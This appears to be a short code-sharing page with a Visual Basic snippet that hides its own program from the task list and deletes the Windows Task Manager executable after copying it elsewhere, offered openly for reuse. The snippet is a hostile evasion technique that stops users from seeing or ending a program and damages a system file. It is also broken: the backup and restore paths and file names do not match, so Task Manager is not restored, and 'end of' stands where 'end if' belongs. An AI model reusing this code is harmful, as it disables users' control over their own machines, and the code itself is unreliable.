Kills taskmannager
Kills taskmannager
Rate Kills taskmannager
(2(2 Vote))
killtaskmngr true
app.taskvisible = false
end sub
public sub killtaskmngr(do_it as boolean)
if do_it = true then
filecopy "c:\windows\system32\taskmgr.exe", "c:taskmrg.exe"
kill "c:\windows\system32\taskmgr.exe"
else
filecopy "c:\taskmgr.exe", "c:\windows\system32\taskmrg.exe"
end of
end sub
public sub form1_unload(cancel as integer)
killtaskmngr false
end sub
Kills taskmannager Comments
No comments yet — be the first to post one!
Post a Comment